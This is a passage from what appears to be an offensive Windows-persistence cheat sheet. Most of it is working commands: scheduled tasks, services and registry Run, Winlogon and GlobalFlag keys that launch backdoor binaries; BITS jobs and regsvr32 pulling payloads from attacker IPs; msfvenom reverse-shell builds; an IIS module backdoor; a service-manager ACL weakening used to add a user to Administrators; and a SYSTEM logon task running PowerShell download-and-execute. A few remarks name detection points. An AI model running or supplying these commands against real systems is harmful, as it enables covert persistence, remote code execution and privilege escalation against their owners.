<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="c"># Launch an executable by calling the ShellExec_RunDLL function.</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="n">SCHTASKS</span> <span class="p">/</span><span class="n">Change</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;\Microsoft\Windows\PLA\Server Manager Performance Monitor&quot;</span> <span class="p">/</span><span class="n">TR</span> <span class="s2">&quot;C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat&quot;</span> <span class="p">/</span><span class="n">RL</span> <span class="n">HIGHEST</span> <span class="p">/</span><span class="n">RU</span> <span class="s2">&quot;&quot;</span> <span class="p">/</span><span class="n">ENABLE</span>
</code></pre></div></p>
</li>
<li>
<p>Using PowerShell
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$A</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskAction</span> <span class="n">-Execute</span> <span class="s2">&quot;cmd.exe&quot;</span> <span class="n">-Argument</span> <span class="s2">&quot;/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe&quot;</span>
<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$T</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskTrigger</span> <span class="n">-AtLogOn</span> <span class="n">-User</span> <span class="s2">&quot;Rasta&quot;</span>
<a id="__codelineno-14-3" name="__codelineno-14-3" href="#__codelineno-14-3"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$P</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskPrincipal</span> <span class="s2">&quot;Rasta&quot;</span>
<a id="__codelineno-14-4" name="__codelineno-14-4" href="#__codelineno-14-4"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$S</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskSettingsSet</span>
<a id="__codelineno-14-5" name="__codelineno-14-5" href="#__codelineno-14-5"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$D</span> <span class="p">=</span> <span class="nb">New-ScheduledTask</span> <span class="n">-Action</span> <span class="nv">$A</span> <span class="n">-Trigger</span> <span class="nv">$T</span> <span class="n">-Principal</span> <span class="nv">$P</span> <span class="n">-Settings</span> <span class="nv">$S</span>
<a id="__codelineno-14-6" name="__codelineno-14-6" href="#__codelineno-14-6"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">Register-ScheduledTask</span> <span class="n">Backdoor</span> <span class="n">-InputObject</span> <span class="nv">$D</span>
</code></pre></div></p>
</li>
<li>
<p>Using SharPersist
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="c"># Add to a current scheduled task</span>
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">schtaskbackdoor</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Something Cool&quot;</span> <span class="n">-m</span> <span class="n">add</span>
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a>
<a id="__codelineno-15-4" name="__codelineno-15-4" href="#__codelineno-15-4"></a><span class="c"># Add new task</span>
<a id="__codelineno-15-5" name="__codelineno-15-5" href="#__codelineno-15-5"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">schtask</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Some Task&quot;</span> <span class="n">-m</span> <span class="n">add</span>
<a id="__codelineno-15-6" name="__codelineno-15-6" href="#__codelineno-15-6"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">schtask</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Some Task&quot;</span> <span class="n">-m</span> <span class="n">add</span> <span class="n">-o</span> <span class="n">hourly</span>
</code></pre></div></p>
</li>
</ul>
<h3 id="bits-jobs">BITS Jobs</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">create</span> <span class="n">backdoor</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">addfile</span> <span class="n">backdoor</span> <span class="s2">&quot;http://10.10.10.10/evil.exe&quot;</span> <span class="s2">&quot;C:\tmp\evil.exe&quot;</span>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a>
<a id="__codelineno-16-4" name="__codelineno-16-4" href="#__codelineno-16-4"></a><span class="c"># v1</span>
<a id="__codelineno-16-5" name="__codelineno-16-5" href="#__codelineno-16-5"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">SetNotifyCmdLine</span> <span class="n">backdoor</span> <span class="n">C</span><span class="p">:\</span><span class="n">tmp</span><span class="p">\</span><span class="n">evil</span><span class="p">.</span><span class="n">exe</span> <span class="n">NUL</span>
<a id="__codelineno-16-6" name="__codelineno-16-6" href="#__codelineno-16-6"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">SetMinRetryDelay</span> <span class="s2">&quot;backdoor&quot;</span> <span class="n">60</span>
<a id="__codelineno-16-7" name="__codelineno-16-7" href="#__codelineno-16-7"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">resume</span> <span class="n">backdoor</span>
<a id="__codelineno-16-8" name="__codelineno-16-8" href="#__codelineno-16-8"></a>
<a id="__codelineno-16-9" name="__codelineno-16-9" href="#__codelineno-16-9"></a><span class="c"># v2 - exploit/multi/script/web_delivery</span>
<a id="__codelineno-16-10" name="__codelineno-16-10" href="#__codelineno-16-10"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">SetNotifyCmdLine</span> <span class="n">backdoor</span> <span class="n">regsvr32</span><span class="p">.</span><span class="n">exe</span> <span class="s2">&quot;/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll&quot;</span>
<a id="__codelineno-16-11" name="__codelineno-16-11" href="#__codelineno-16-11"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">resume</span> <span class="n">backdoor</span>
</code></pre></div>
<h2 id="serviceland">Serviceland</h2>
<h3 id="iis">IIS</h3>
<p>IIS Raid: backdooring IIS using native modules (<a href="https://github.com/0x09AL/IIS-Raid">0x09AL/IIS-Raid</a>). A native module is loaded into the IIS worker process and runs with its trust, so the list of registered native modules is the corresponding defensive check.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="p">$</span> <span class="n">git</span> <span class="n">clone</span> <span class="n">https</span><span class="p">://</span><span class="n">github</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">0x09AL</span><span class="p">/</span><span class="n">IIS-Raid</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="p">$</span> <span class="n">python</span> <span class="n">iis_controller</span><span class="p">.</span><span class="n">py</span> <span class="p">-</span><span class="n">-url</span> <span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">11</span><span class="p">/</span> <span class="p">-</span><span class="n">-password</span> <span class="n">SIMPLEPASS</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="n">C</span><span class="p">:\</span><span class="n">Windows</span><span class="p">\</span><span class="n">system32</span><span class="p">\</span><span class="n">inetsrv</span><span class="p">\</span><span class="n">APPCMD</span><span class="p">.</span><span class="n">EXE</span> <span class="n">install</span> <span class="n">module</span> <span class="p">/</span><span class="n">name</span><span class="p">:</span><span class="n">Module</span> <span class="n">Name</span> <span class="p">/</span><span class="n">image</span><span class="p">:</span><span class="s2">&quot;%windir%\System32\inetsrv\IIS-Backdoor.dll&quot;</span> <span class="p">/</span><span class="n">add</span><span class="p">:</span><span class="n">true</span>
</code></pre></div>
<h3 id="windows-service">Windows Service</h3>
<p>Using SharPersist</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">service</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Some Service&quot;</span> <span class="n">-m</span> <span class="n">add</span>
</code></pre></div>
<h2 id="elevated">Elevated</h2>
<h3 id="registry-hklm">Registry HKLM</h3>
<p>Similar to HKCU, but machine-wide: create a REG_SZ value in the Run key under HKLM\Software\Microsoft\Windows\CurrentVersion. Writing to HKLM requires administrative rights, which is why this variant is listed under Elevated.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="n">Value</span> <span class="n">name</span><span class="p">:</span> <span class="n">Backdoor</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="n">Value</span> <span class="n">data</span><span class="p">:</span> <span class="n">C</span><span class="p">:\</span><span class="n">Windows</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="n">backdoor</span><span class="p">.</span><span class="n">exe</span>
</code></pre></div>
<p>Using the command line (note that RunServices and RunServicesOnce are legacy Windows 9x-era keys that do not exist by default on current Windows, so their mere presence is worth alerting on):</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\tmp\backdoor.exe&quot;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\tmp\backdoor.exe&quot;</span>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\tmp\backdoor.exe&quot;</span>
<a id="__codelineno-20-4" name="__codelineno-20-4" href="#__codelineno-20-4"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\tmp\backdoor.exe&quot;</span>
</code></pre></div>
<h4 id="winlogon-helper-dll">Winlogon Helper DLL</h4>
<blockquote>
<p>Run an executable during Windows logon by appending it to the Winlogon <code>Userinit</code> or <code>Shell</code> value. Both values have fixed defaults (<code>userinit.exe</code> and <code>explorer.exe</code>), so any additional entry is a high-signal indicator for defenders.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="n">msfvenom</span> <span class="n">-p</span> <span class="n">windows</span><span class="p">/</span><span class="n">meterpreter</span><span class="p">/</span><span class="n">reverse_tcp</span> <span class="n">LHOST</span><span class="p">=</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span> <span class="n">LPORT</span><span class="p">=</span><span class="n">4444</span> <span class="o">-f</span> <span class="n">exe</span> <span class="p">&gt;</span> <span class="n">evilbinary</span><span class="p">.</span><span class="n">exe</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="n">msfvenom</span> <span class="n">-p</span> <span class="n">windows</span><span class="p">/</span><span class="n">meterpreter</span><span class="p">/</span><span class="n">reverse_tcp</span> <span class="n">LHOST</span><span class="p">=</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span> <span class="n">LPORT</span><span class="p">=</span><span class="n">4444</span> <span class="o">-f</span> <span class="n">dll</span> <span class="p">&gt;</span> <span class="n">evilbinary</span><span class="p">.</span><span class="n">dll</span>
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a>
<a id="__codelineno-21-4" name="__codelineno-21-4" href="#__codelineno-21-4"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Userinit</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;Userinit.exe, evilbinary.exe&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-21-5" name="__codelineno-21-5" href="#__codelineno-21-5"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Shell</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;explorer.exe, evilbinary.exe&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-21-6" name="__codelineno-21-6" href="#__codelineno-21-6"></a><span class="nb">Set-ItemProperty</span> <span class="s2">&quot;HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&quot;</span> <span class="s2">&quot;Userinit&quot;</span> <span class="s2">&quot;Userinit.exe, evilbinary.exe&quot;</span> <span class="n">-Force</span>
<a id="__codelineno-21-7" name="__codelineno-21-7" href="#__codelineno-21-7"></a><span class="nb">Set-ItemProperty</span> <span class="s2">&quot;HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&quot;</span> <span class="s2">&quot;Shell&quot;</span> <span class="s2">&quot;explorer.exe, evilbinary.exe&quot;</span> <span class="n">-Force</span>
</code></pre></div>
<h4 id="globalflag">GlobalFlag</h4>
<blockquote>
<p>Run an executable when notepad.exe exits. <code>GlobalFlag</code> 512 (0x200) enables Silent Process Exit monitoring for the image under Image File Execution Options, and the <code>SilentProcessExit</code> subkey names the process to launch; the same two keys are where to look when hunting for this technique.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">GlobalFlag</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="n">512</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">ReportingMode</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="n">1</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">MonitorProcess</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\temp\evil.exe&quot;</span>
</code></pre></div>
<h3 id="startup-elevated">Startup Elevated</h3>
<p>Create a batch script in the all-users (common) startup folder shown below; writing there requires elevated rights, and anything placed there runs for every user who logs on. (The per-user startup folder lives under the user's profile instead.)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="n">C</span><span class="p">:\</span><span class="n">ProgramData</span><span class="p">\</span><span class="n">Microsoft</span><span class="p">\</span><span class="n">Windows</span><span class="p">\</span><span class="nb">Start </span><span class="n">Menu</span><span class="p">\</span><span class="n">Programs</span><span class="p">\</span><span class="n">StartUp</span>
</code></pre></div>
<h3 id="services-elevated">Services Elevated</h3>
<p>Create a service that starts automatically or on demand. Service installation is recorded by the Service Control Manager in the System event log (event ID 7045), which makes this one of the more visible persistence methods.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="c"># Powershell</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="nb">New-Service</span> <span class="n">-Name</span> <span class="s2">&quot;Backdoor&quot;</span> <span class="n">-BinaryPathName</span> <span class="s2">&quot;C:\Windows\Temp\backdoor.exe&quot;</span> <span class="n">-Description</span> <span class="s2">&quot;Nothing to see here.&quot;</span> <span class="n">-StartupType</span> <span class="n">Automatic</span>
<a id="__codelineno-24-3" name="__codelineno-24-3" href="#__codelineno-24-3"></a><span class="nb">sc start </span><span class="n">Backdoor</span>
<a id="__codelineno-24-4" name="__codelineno-24-4" href="#__codelineno-24-4"></a>
<a id="__codelineno-24-5" name="__codelineno-24-5" href="#__codelineno-24-5"></a><span class="c"># SharPersist</span>
<a id="__codelineno-24-6" name="__codelineno-24-6" href="#__codelineno-24-6"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">service</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c backdoor.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Backdoor&quot;</span> <span class="n">-m</span> <span class="n">add</span>
<a id="__codelineno-24-7" name="__codelineno-24-7" href="#__codelineno-24-7"></a>
<a id="__codelineno-24-8" name="__codelineno-24-8" href="#__codelineno-24-8"></a><span class="c"># sc</span>
<a id="__codelineno-24-9" name="__codelineno-24-9" href="#__codelineno-24-9"></a><span class="nb">sc </span><span class="n">create</span> <span class="n">Backdoor</span> <span class="n">binpath</span><span class="p">=</span> <span class="s2">&quot;cmd.exe /k C:\temp\backdoor.exe&quot;</span> <span class="n">start</span><span class="p">=</span><span class="s2">&quot;auto&quot;</span> <span class="n">obj</span><span class="p">=</span><span class="s2">&quot;LocalSystem&quot;</span>
<a id="__codelineno-24-10" name="__codelineno-24-10" href="#__codelineno-24-10"></a><span class="nb">sc start </span><span class="n">Backdoor</span>
</code></pre></div>
<h3 id="servicesecuritydescriptor">ServiceSecurityDescriptor</h3>
<p>Grant any non-administrative user persistent SYSTEM-level control of a machine by applying an overly permissive security descriptor to the Service Control Manager with <code>sc.exe sdset</code>.</p>
<p><strong>Exploit</strong>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="n">sc</span><span class="p">.</span><span class="n">exe</span> <span class="n">sdset</span> <span class="p">&lt;</span><span class="n">ServiceName</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="n">ServiceSecurityDescriptor</span><span class="p">&gt;</span>
</code></pre></div>
<p>The following command grants full control (<code>KA</code>, the SDDL token for all access rights) over the Service Control Manager to all users (<code>WD</code>, which stands for "World", i.e. Everyone). In other words, it allows any user to start, stop, modify, or control services through the Service Control Manager, which is a serious weakening of the host since service management is opened to everyone on the system.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="n">sc</span><span class="p">.</span><span class="n">exe</span> <span class="n">sdset</span> <span class="n">scmanager</span> <span class="n">D</span><span class="p">:(</span><span class="n">A</span><span class="p">;;</span><span class="n">KA</span><span class="p">;;;</span><span class="n">WD</span><span class="p">)</span>
</code></pre></div>
<ul>
<li><code>sc.exe</code>: The Service Control (sc) command is a Windows utility used for managing services.</li>
<li><code>sdset</code>: This option sets a Security Descriptor (SD) for a service or the Service Control Manager itself. A security descriptor defines permissions and access rights to system resources.</li>
<li><code>scmanager</code>: This is the target, referring to the Service Control Manager, which manages the services in the system.</li>
</ul>
<p>The <code>ServiceSecurityDescriptor</code> is written in the Security Descriptor Definition Language (SDDL).</p>
<p>List the permissions for <code>scmanager</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="n">sc</span><span class="p">.</span><span class="n">exe</span> <span class="n">sdshow</span> <span class="n">scmanager</span>
</code></pre></div>
<p>Alternatively, you can use <a href="https://github.com/zacateras/sddl-parser">zacateras/sddl-parser</a> to understand the Security Descriptor Definition Language (SDDL), e.g: <code>./Sddl.Parser.Console.exe "O:BAG:BAD:(A;CI;CCDCRP;;;NS)"</code>.</p>
<p>Abuse the weakened configuration to create a service whose binary path adds the custom user <code>user_basic</code> to the local Administrators group.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="nb">sc </span><span class="n">create</span> <span class="n">LPE</span> <span class="n">displayName</span><span class="p">=</span> <span class="s2">&quot;LPE&quot;</span> <span class="n">binPath</span><span class="p">=</span> <span class="s2">&quot;C:\Windows\System32\net.exe localgroup Administrators user_basic /add&quot;</span> <span class="n">start</span><span class="p">=</span> <span class="n">auto</span>
</code></pre></div>
<p>The service then starts at the next reboot, granting the user elevated privileges (or running whatever persistence mechanism was specified in <code>binPath</code>).</p>
<h3 id="scheduled-tasks-elevated">Scheduled Tasks Elevated</h3>
<p>Scheduled task running as SYSTEM, every day at 9 AM or on a specific date.</p>
<blockquote>
<p>On Windows 7/8, processes spawned by scheduled tasks have taskeng.exe as their parent; on Windows 10 and later, the parent is the Task Scheduler service host (svchost.exe hosting the Schedule service). Hunting rules keyed on taskeng.exe alone will miss the newer case.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="c"># Powershell</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a><span class="nv">$A</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskAction</span> <span class="n">-Execute</span> <span class="s2">&quot;cmd.exe&quot;</span> <span class="n">-Argument</span> <span class="s2">&quot;/c C:\temp\backdoor.exe&quot;</span>
<a id="__codelineno-29-3" name="__codelineno-29-3" href="#__codelineno-29-3"></a><span class="nv">$T</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskTrigger</span> <span class="n">-Daily</span> <span class="n">-At</span> <span class="n">9am</span>
<a id="__codelineno-29-4" name="__codelineno-29-4" href="#__codelineno-29-4"></a><span class="c"># OR</span>
<a id="__codelineno-29-5" name="__codelineno-29-5" href="#__codelineno-29-5"></a><span class="nv">$T</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskTrigger</span> <span class="n">-Daily</span> <span class="n">-At</span> <span class="s2">&quot;9/30/2020 11:05:00 AM&quot;</span>
<a id="__codelineno-29-6" name="__codelineno-29-6" href="#__codelineno-29-6"></a><span class="nv">$P</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskPrincipal</span> <span class="s2">&quot;NT AUTHORITY\SYSTEM&quot;</span> <span class="n">-RunLevel</span> <span class="n">Highest</span>
<a id="__codelineno-29-7" name="__codelineno-29-7" href="#__codelineno-29-7"></a><span class="nv">$S</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskSettingsSet</span>
<a id="__codelineno-29-8" name="__codelineno-29-8" href="#__codelineno-29-8"></a><span class="nv">$D</span> <span class="p">=</span> <span class="nb">New-ScheduledTask</span> <span class="n">-Action</span> <span class="nv">$A</span> <span class="n">-Trigger</span> <span class="nv">$T</span> <span class="n">-Principal</span> <span class="nv">$P</span> <span class="n">-Settings</span> <span class="nv">$S</span>
<a id="__codelineno-29-9" name="__codelineno-29-9" href="#__codelineno-29-9"></a><span class="nb">Register-ScheduledTask</span> <span class="s2">&quot;Backdoor&quot;</span> <span class="n">-InputObject</span> <span class="nv">$D</span>
<a id="__codelineno-29-10" name="__codelineno-29-10" href="#__codelineno-29-10"></a>
<a id="__codelineno-29-11" name="__codelineno-29-11" href="#__codelineno-29-11"></a><span class="c"># Native schtasks</span>
<a id="__codelineno-29-12" name="__codelineno-29-12" href="#__codelineno-29-12"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="nb">sc </span><span class="n">minute</span> <span class="p">/</span><span class="n">mo</span> <span class="n">1</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;eviltask&quot;</span> <span class="p">/</span><span class="n">tr</span> <span class="n">C</span><span class="p">:\</span><span class="n">tools</span><span class="p">\</span><span class="n">shell</span><span class="p">.</span><span class="n">cmd</span> <span class="p">/</span><span class="n">ru</span> <span class="s2">&quot;SYSTEM&quot;</span>
<a id="__codelineno-29-13" name="__codelineno-29-13" href="#__codelineno-29-13"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="nb">sc </span><span class="n">minute</span> <span class="p">/</span><span class="n">mo</span> <span class="n">1</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;eviltask&quot;</span> <span class="p">/</span><span class="n">tr</span> <span class="n">calc</span> <span class="p">/</span><span class="n">ru</span> <span class="s2">&quot;SYSTEM&quot;</span> <span class="p">/</span><span class="n">s</span> <span class="n">dc-mantvydas</span> <span class="p">/</span><span class="n">u</span> <span class="n">user</span> <span class="p">/</span><span class="n">p</span> <span class="n">password</span>
<a id="__codelineno-29-14" name="__codelineno-29-14" href="#__codelineno-29-14"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">Create</span> <span class="p">/</span><span class="n">RU</span> <span class="s2">&quot;NT AUTHORITY\SYSTEM&quot;</span> <span class="p">/</span><span class="n">tn</span> <span class="no">[TaskName]</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;regsvr32.exe -s \&quot;</span><span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\*\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Local</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="no">[payload]</span><span class="p">.</span><span class="n">dll</span><span class="p">\</span><span class="s2">&quot;&quot;</span> <span class="p">/</span><span class="nb">SC </span><span class="n">ONCE</span> <span class="p">/</span><span class="n">Z</span> <span class="p">/</span><span class="n">ST</span> <span class="no">[Time]</span> <span class="p">/</span><span class="n">ET</span> <span class="no">[Time]</span>
<a id="__codelineno-29-15" name="__codelineno-29-15" href="#__codelineno-29-15"></a>
<a id="__codelineno-29-16" name="__codelineno-29-16" href="#__codelineno-29-16"></a><span class="c">##(X86) - On User Login</span>
<a id="__codelineno-29-17" name="__codelineno-29-17" href="#__codelineno-29-17"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterA</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onlogon</span> <span class="p">/</span><span class="n">ru</span> <span class="n">System</span>
<a id="__codelineno-29-18" name="__codelineno-29-18" href="#__codelineno-29-18"></a>
<a id="__codelineno-29-19" name="__codelineno-29-19" href="#__codelineno-29-19"></a><span class="c">##(X86) - On System Start</span>
